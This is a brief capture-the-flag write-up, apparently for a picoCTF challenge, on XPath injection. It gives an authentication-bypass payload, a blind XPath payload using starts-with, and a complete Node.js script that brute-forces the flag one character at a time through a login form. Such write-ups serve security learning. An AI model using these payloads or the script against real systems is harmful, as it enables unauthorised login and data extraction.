1. Overview
XPath injection, blind SQL injection
2. Analysis
Because the login is vulnerable in the same way as SQL injection, entering ' or 'a' ='a makes the page display the message "You're on the right path".
However, XPATH was given as a hint, so XPath functions can be used in the payload, for example ' or //*[starts-with(text(),'picoCTF{')] or '1'=' . Whether "right path" appears in the response message acts as a true/false oracle, so the flag can be brute-forced one character at a time, a blind injection in the same style as blind SQL injection.
3. Code
const axios = require('axios')

let isFindFlag = false
let flag = "picoCTF{"
// Candidate characters tried for each flag position
const table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ{}!_-"

// Sends one login attempt whose pass field carries the XPath payload and
// returns true when the server answers with the "right path" message,
// i.e. when flag + character is a prefix of some text node in the document
const checkCharacterIsPartOfFlag = async (character) => {
  const targetUrl = "http://mercury.picoctf.net:28065/"
  const name = "admin"
  const pass = `' or //*[starts-with(text(),'${flag}${character}')] or '1'='`
  const headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
  }
  const data = {
    name: name,
    pass: pass
  }
  try {
    const responseHtml = await axios.post(targetUrl, data, { headers })
    return responseHtml?.data?.includes("re on the right path.")
  } catch (err) {
    return false
  }
}

const updateFlag = (character) => {
  flag = `${flag}${character}`
}

const printFlag = () => {
  console.log(flag)
}

// The closing brace marks the end of the flag
const isEndOfFlag = (character) => {
  return character === '}'
}

// Extends the known prefix one character at a time, restarting the
// candidate loop after each confirmed character
const main = async () => {
  while (!isFindFlag) {
    for (const ascii of table) {
      const result = await checkCharacterIsPartOfFlag(ascii)
      if (!result) {
        continue
      }
      updateFlag(ascii)
      printFlag()
      if (isEndOfFlag(ascii)) {
        isFindFlag = true
        break
      }
    }
  }
}

main()